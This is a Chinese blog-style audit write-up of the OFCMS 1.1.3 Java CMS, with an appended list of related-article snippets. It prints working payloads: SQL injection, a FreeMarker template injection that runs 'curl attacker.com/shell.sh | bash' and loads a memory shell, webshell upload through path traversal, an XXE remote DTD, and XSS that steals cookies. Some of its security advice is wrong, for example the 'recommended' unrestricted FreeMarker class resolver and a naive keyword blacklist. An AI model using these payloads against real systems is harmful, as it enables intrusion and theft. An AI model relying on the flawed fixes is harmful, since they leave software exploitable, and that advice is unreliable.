当前位置: 首页 > article >正文

【Java代码审计实战】OFCMS 1.1.3漏洞挖掘与复现指南

1. OFCMS 1.1.3环境搭建实战搞Java代码审计的第一步永远是搭建测试环境。我花了三天时间折腾OFCMS 1.1.3的环境搭建踩过的坑比想象中多得多。这个CMS的自动安装功能基本就是个摆设最后还是得靠手动部署。下面把我验证过的完整流程分享给大家跟着做能省下至少80%的折腾时间。1.1 项目获取与基础配置源码仓库在Gitee上可以直接克隆git clone -b V1.1.3 https://gitee.com/oufu/ofcms.git用IDEA导入项目时有个关键点必须用Maven方式导入。我最初直接当普通Java项目导入结果依赖全乱套了。导入成功后先别急着启动得处理几个致命配置修改ofcms-admin/pom.xml里的jdk版本默认1.7建议改成你本地版本检查MySQL连接器版本5.x和8.x的驱动类名不同删除ofcms-admin/src/test下的测试用例有些用例会干扰启动1.2 数据库手动部署指南自动安装失败太正常了直接看手动方案。先在MySQL执行CREATE DATABASE ofcms CHARACTER SET utf8mb4; USE ofcms; SOURCE /path/to/ofcms-v1.1.3.sql;重点来了配置文件改名不是简单的重命名需要两步操作把db-config.properties复制一份改名为db.properties修改内容时注意密码加密问题如果密码含特殊字符要用\转义启动时如果报JFinalConfig相关错误试试这个命令mvn clean compile -U1.3 常见启动问题排查我遇到过最恶心的两个问题端口冲突修改ofcms-admin/src/main/webapp/WEB-INF/web.xml里的port标签静态资源加载失败检查SystemUtile.getSiteTemplatePath()返回值是否包含中文路径后台登录地址是http://localhost:8080/ofcms_admin_war/admin/index.html如果404了别慌可能是项目名没识别对试试直接访问/admin路径。2. SQL注入漏洞深度解析2.1 漏洞触发路径追踪这个SQL注入点在后台代码生成功能里特别隐蔽。通过逆向工程定位到关键代码在SystemGenerateController.create()public void create() { String sql getPara(sql); // 直接获取未过滤参数 Db.update(sql); // 动态执行SQL }JFinal框架的Db.update()虽然支持预编译但这里直接把用户输入当完整SQL执行。更危险的是这个方法在Before拦截器里居然被放行了。2.2 漏洞利用实战技巧报错注入payload需要点小技巧UPDATE of_cms_link SET link_nameupdatexml(1,concat(0x7e,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schemadatabase())),1) WHERE link_id1几个注意点必须用UPDATE语句INSERT会被框架拦截字段值长度有限制用substring()分段获取数据遇到单引号过滤时可以用CHAR()函数绕过2.3 防御方案对比对比三种修复方式的效果方案实现难度安全性性能影响预编译占位符低高无SQL关键词过滤中中轻微存储过程封装高高中等实测发现最简单的修复是在Controller里加这行if(sql.contains(select) || sql.contains(union)) throw new RuntimeException(非法操作);3. SSTI模板注入攻防3.1 FreeMarker引擎漏洞原理在pom.xml里发现用的是FreeMarker 2.3.23这个版本存在模板注入风险。漏洞触发链是这样的后台修改模板内容时TemplateController.save()直接接收原始输入fileContent.replace()处理存在缺陷只做了基本HTML解码模板渲染时自动执行恶意表达式3.2 漏洞利用花样玩法除了弹计算器这种基础操作还可以#assign rtObject().getClass().forName(java.lang.Runtime).getRuntime() ${ rt.exec(curl http://attacker.com/shell.sh | bash) }更隐蔽的利用方式是用TemplateModel接口实现内存马#assign classloaderObject().getClass().getClassLoader() #assign clazzclassloader.loadClass(metasploit.Payload) ${ clazz.newInstance() }3.3 防御方案实测试了三种防护方法升级FreeMarker到2.3.31部分语法仍可执行配置TemplateExceptionHandler.RETHROW_HANDLER会破坏正常功能自定义TemplateLoader过滤危险标签推荐方案最终采用的方案是在freemarker.properties中加入template_exception_handlerrethrow new_builtin_class_resolverunrestricted4. 文件上传漏洞的花式利用4.1 漏洞点代码审计同一个TemplateController.save()方法里藏着文件上传漏洞关键问题在File file new File(pathFile, fileName); // 未校验路径穿越 FileUtils.writeString(file, fileContent); // 直接写入内容利用条件比想象中宽松不需要登录某些版本存在鉴权绕过允许上传任意后缀文件目录穿越可达web根目录4.2 冰蝎马植入实战上传jsp马时有个坑必须用URL编码后的内容。推荐用Burp的Decoder模块处理原始jsp代码 → URL编码全选编码修改file_name../../../static/shell.jsp注意路径深度用../../测试到正确层数连接时如果500报错可能是文件编码问题尝试UTF-8 without BOM路径权限问题检查tomcat的webapps目录权限冰蝎版本不匹配试试3.0或4.04.3 防御方案对比测试测试了三种防护方案文件内容校验容易被绕过白名单后缀过滤影响业务功能文件存储分离推荐方案最终采用的安全配置// 在FileUtils.writeString前添加校验 if(fileName.contains(../) || !fileName.endsWith(.html)) { throw new SecurityException(非法文件名); }5. XXE与存储型XSS漏洞挖掘5.1 XXE漏洞利用链分析ReprotAction.expReport()方法的危险调用链JasperCompileManager.compileReport() → JRXmlLoader.load() → Digester.parse() // 未禁用外部实体利用时需要先上传恶意jrxml文件!DOCTYPE xxe [!ENTITY % remote SYSTEM http://attacker.com/evil.dtd%remote;] rootexfil;/root5.2 存储型XSS的持久化攻击新闻评论处的XSS特别适合钓鱼scriptnew Image().srchttp://attacker.com/steal?cookiedocument.cookie/script在审计时发现更危险的DOM型XSSeval(location.hash.slice(1)); // 可通过#alert(1)触发5.3 综合防御建议在web.xml添加全局过滤器filter filter-namexssFilter/filter-name filter-classcom.ofsoft.cms.filter.XssFilter/filter-class /filter数据库层防御StringEscapeUtils.escapeHtml4(content); // 入库前转义响应头加固response.setHeader(X-XSS-Protection, 1; modeblock);

相关文章:

【Java代码审计实战】OFCMS 1.1.3漏洞挖掘与复现指南

1. OFCMS 1.1.3环境搭建实战 搞Java代码审计的第一步永远是搭建测试环境。我花了三天时间折腾OFCMS 1.1.3的环境搭建,踩过的坑比想象中多得多。这个CMS的自动安装功能基本就是个摆设,最后还是得靠手动部署。下面把我验证过的完整流程分享给大家&#xff…...

2026年AI音乐创作工具推荐:让每个人都能成为作曲家

在2026年的今天,人工智能已经彻底改变了音乐创作的格局。无论你是想为短视频寻找完美的背景音乐,还是想创作一首属于自己的完整歌曲,亦或是专业音乐人需要灵感辅助,现在的AI音乐工具都能为你提供强大的支持。本文将为你精选几款值…...

为什么关闭Git的SSL验证是下策?安全工程师教你正确处理证书错误

为什么关闭Git的SSL验证是下策?安全工程师教你正确处理证书错误 当你深夜赶项目时,突然在终端看到鲜红的unable to get local issuer certificate错误,第一反应是不是想快速禁用SSL验证?作为处理过数百起企业安全事件的老兵&#…...

Kettle实战100篇 第11篇 JavaScript脚本中日志级别与调试技巧

1. JavaScript脚本日志输出的必要性 在Kettle中使用JavaScript脚本时,经常会遇到各种问题需要调试。虽然Kettle本身提供了日志功能,但默认的日志输出往往无法满足我们的需求。比如当脚本逻辑复杂、变量多的时候,单纯依靠Kettle的步骤日志很难…...

面向智能仓储的动态建模与空间计算融合技术体系构建研究—— 基于 Pixel-to-Space 的三维轨迹建模与行为认知方法体系

面向智能仓储的动态建模与空间计算融合技术体系构建研究—— 基于 Pixel-to-Space 的三维轨迹建模与行为认知方法体系一、研究背景:智能仓储迈入“空间计算时代”随着仓储系统从自动化向智能化升级,其核心能力正在发生深刻转变。传统仓储系统以流程执行与…...

海康VisionMaster实战笔记:从零搭建字符识别与TCP通信方案

1. 海康VisionMaster入门:为什么选择它做字符识别? 第一次接触海康VisionMaster时,我就被它的模块化设计惊艳到了。作为一个工业视觉开发平台,它把复杂的图像处理流程拆解成一个个可视化工具,就像搭积木一样简单。我做…...

HY-Motion 1.0保姆级教程:日志分析+性能监控+错误定位全链路

HY-Motion 1.0保姆级教程:日志分析性能监控错误定位全链路 1. 引言:为什么需要全链路监控? 当你用HY-Motion 1.0生成3D动作时,有没有遇到过这些问题:生成的动作卡顿不流畅、提示词明明写对了却生成奇怪的动作、或者干…...

当波束成形遇上导向矢量失配:特征子空间投影法如何成为你的‘纠偏’利器?

当波束成形遇上导向矢量失配:特征子空间投影法的工程救赎 在雷达探测、声呐定位和5G Massive MIMO系统中,阵列天线工程师们常会遇到一个令人头疼的现象:理论上精心设计的波束指向,在实际环境中总会出现微妙的"跑偏"。这…...

分享一个基于MCU实现智能陪伴时钟的项目

来源 | 瑞萨嵌入式小百科01项目功能介绍搬了家,一直缺一个时钟来看时间,这次项目,选择陶瓷灯丝时钟为框架,使用瑞萨R7FA2E1A72DFL为主控,加上Tuya Wi-Fi模组,制作一款可以联动家庭智能家居设备的智能时钟。…...

避坑指南:Jenkins连接Nexus3常见7大错误排查(含SSL配置/凭据失效/仓库路径错误)

Jenkins与Nexus3集成实战:7类典型连接故障深度解析 在持续集成与交付(CI/CD)的自动化流水线中,Jenkins与Nexus3的协同工作已成为现代DevOps架构的标准配置。但当这两个系统间的通信链路出现问题时,往往会让运维团队陷入…...

从Dockerfile到健康检查:给你的.NET Core WebApi容器加点‘企业级’配置

从Dockerfile到健康检查:打造企业级.NET Core WebApi容器的最佳实践 在容器化技术席卷全球的今天,仅仅让应用在Docker中"跑起来"已经远远不够。对于中高级开发者和DevOps工程师而言,如何让ASP.NET Core WebApi容器在生产环境中表现…...

ICM45605六轴IMU驱动开发:APEX算法与FIFO中断实战

1. ICM45605 高性能六轴惯性测量单元深度解析与嵌入式驱动实践1.1 芯片定位与系统级价值ICM45605 是 TDK InvenSense 推出的高性能 6 轴 MotionTracking™ IMU,属于 ICM456xx 系列的旗舰型号。其核心价值不仅在于提供加速度计与陀螺仪原始数据,更在于将高…...

探索基于超螺旋滑模观测器的永磁同步电机无位置传感器控制策略

基于超螺旋滑模观测器的永磁同步电机无位置传感器控制策略 全套仿真、公式推导、配套论文以及调试过程在电机控制领域,永磁同步电机(PMSM)因其高效、高功率密度等优点被广泛应用。然而,传统的PMSM控制通常依赖位置传感器来获取转子…...

探秘TSMC 40nm工艺库

TSMC40nm工艺库在芯片制造的广袤世界里,TSMC(台积电)一直是行业的领军者,其40nm工艺库更是有着独特的魅力与价值。 TSMC 40nm工艺库简介 TSMC 40nm工艺库是台积电在特定制程节点下,为芯片设计工程师们精心打造的一套“…...

架构实战:机房轮式巡检机器人梯控的非侵入式边缘解耦设计

摘要: 在大型数据中心(IDC)的动环巡检项目中,轮式机器人因其续航长、承载力大而被广泛应用。然而,将高动态的机器人调度系统与传统的机房电梯控制环境相融合,是一项复杂的架构难题。特别是轮式底盘对平层精…...

灰狼算法实现部分遮阴下的MPPT跟踪探索

灰狼算法实现部分遮阴的MPPT跟踪,包括光照突变情况,包括灰狼算法程序和matlab/simulink模型的搭建,功率,电压,电流波形图和占空比波形图入如下。在光伏系统中,最大功率点跟踪(MPPT)技…...

机器学习入门:如何用Python实现概念学习(Concept Learning)的完整流程

机器学习入门:如何用Python实现概念学习的完整流程 在人工智能的浪潮中,机器学习作为核心驱动力之一,正在重塑我们解决问题的思维方式。而概念学习(Concept Learning)作为机器学习的基础范式,尤其适合作为初…...

二线城市二本毕业生,工作清闲的我考过CDA数据分析师一级,顺利转行零售集团运营岗

作者简介:萌萌酱同学,二线城市二本毕业生,考过CDA转行零售集团运营岗我读的是一所二线城市的二本学校,专业算是文理兼修吧。大学时虽然刻苦,活动没少参加,考试基本前5,但每次高中同学聚会还是会…...

HTML+CSS+JS打造动态新年倒计时网页(附完整源码)

1. 项目概述与效果预览 想要在网页上展示一个酷炫的新年倒计时效果吗?用HTMLCSSJS三件套就能轻松实现!这个项目将带你从零开始打造一个动态数字时钟节日特效背景交互音效的完整页面。最终效果会显示距离新年的精确倒计时(天/时/分/秒&#xf…...

读了libstdc++ std::vector源码,发现你的push_back可能比你想象的慢10倍——6个隐藏的性能陷阱

一、那行push_back到底发生了什么 C++程序员最熟悉的容器是谁?std::vector。 面试要用它,刷题要用它,生产代码里更是到处都是。随手grep一下手头的项目,vector的出现频率是map的4倍、list的12倍、deque的20倍。能用vector的地方,大家默认就用vector——C++ Core Guideli…...

【实战指南】CCPD数据集车牌检测框坐标解析与YOLO格式转换技巧

1. CCPD数据集车牌检测实战入门 第一次接触CCPD数据集时,我被它独特的文件名编码方式吸引了。这个数据集包含了超过30万张真实场景下的车牌图片,每张图片的文件名都像是一个密码本,藏着车牌位置的关键信息。比如"025-95&449_186&…...

华为OD机考双机位C卷 - 文件缓存系统 (Java)

 文件缓存系统 2026华为OD机试双机位C卷 - 华为OD上机考试双机位C卷 华为OD机试双机位C卷真题目录(Java)点击查看: 【全网首发】2026华为OD机位C卷 机考真题题库含考点说明以及在线OJ(Java题解) 题目描述 请设计一个文件缓存系统,该文件缓存系统可以指定缓存的最大值…...

视频查重神器 vs 传统算法:实测3种工具在二次剪辑检测中的表现差异

视频查重技术深度评测:AI算法如何颠覆二次创作检测 短视频行业的爆发式增长让内容原创性保护成为创作者和平台共同关注的焦点。每天有数百万条视频被上传到各大平台,其中不乏经过简单修改的"二次创作"内容。这些视频可能只是添加了滤镜、贴纸或…...

华为OD机考双机位C卷 - 文件存储系统的排序 (Java)

文件存储系统的排序 2026华为OD机试双机位C卷 - 华为OD上机考试双机位C卷 华为OD机试双机位C卷真题目录(Java)点击查看: 【全网首发】2026华为OD机位C卷 机考真题题库含考点说明以及在线OJ(Java题解) 题目描述 在一个网络文件存储系统中,有众多的文件按照不同的文件夹进…...

MONAI实战:5分钟搞定医学影像分割的增强版UNet配置

MONAI实战:5分钟搞定医学影像分割的增强版UNet配置 医学影像分割一直是医疗AI领域的热门研究方向,而UNet作为经典的编码器-解码器结构,在各类分割任务中表现优异。但传统的UNet实现往往需要从零开始搭建,调试过程繁琐。MONAI框架提…...

常见的数据泄露风险与保密与防范策略,一文详解!

常见的数据泄露风险与保密与防范策略,一文详解!常见的数据泄露风险与保密与防范策略 大数据、云计算、物联网、人工智能等新技术的迅猛发展和广泛应用,为我们带来工作便利的同时,数据泄露与数据窃取渠道、手段也更加多样&#xff…...

保姆级教程:在RK3588上部署多模型YOLOv5,用QuickRun实现25FPS高并发推理

在RK3588上构建高效多模型YOLOv5推理系统的全流程指南 引言 当我们需要在嵌入式设备上同时运行多个视觉检测模型时,系统资源的高效利用和推理性能的优化就变得尤为关键。RK3588作为一款强大的AIoT芯片,其NPU算力可达6TOPS,为多模型并行推理提…...

浅谈密码学(一)基础知识

浅谈密码学(一)基础知识说到密码想必大家都不陌生,其实世界上有两种密码,通俗的说:一种是防止小孩偷看你的文件;另一种是防止当局阅读你的文件。那么现在我们来说说专业术语发送者和接收者 发送者和接收者就…...

手把手教你用Dify的Rookie插件连接MySQL,给AI装上‘数据透视’的眼睛(Spring Boot做数据源)

深度集成Dify与MySQL:用Rookie插件构建AI数据透视系统 在数据驱动的决策时代,企业越来越依赖AI来挖掘数据价值。本文将深入探讨如何通过Dify平台的Rookie插件实现与Spring Boot管理的MySQL数据库的无缝对接,为AI系统装上"数据透视"…...

青龙面板抓包实战:VMOS虚拟机与小黄鸟完美配合指南

1. 为什么需要VMOS虚拟机配合小黄鸟抓包 很多安卓用户在尝试使用HttpCanary(小黄鸟)进行抓包时都会遇到一个棘手问题:目标应用检测到抓包行为后会自动断开网络连接。这种情况在金融类、社交类应用中尤为常见。我刚开始接触抓包时,…...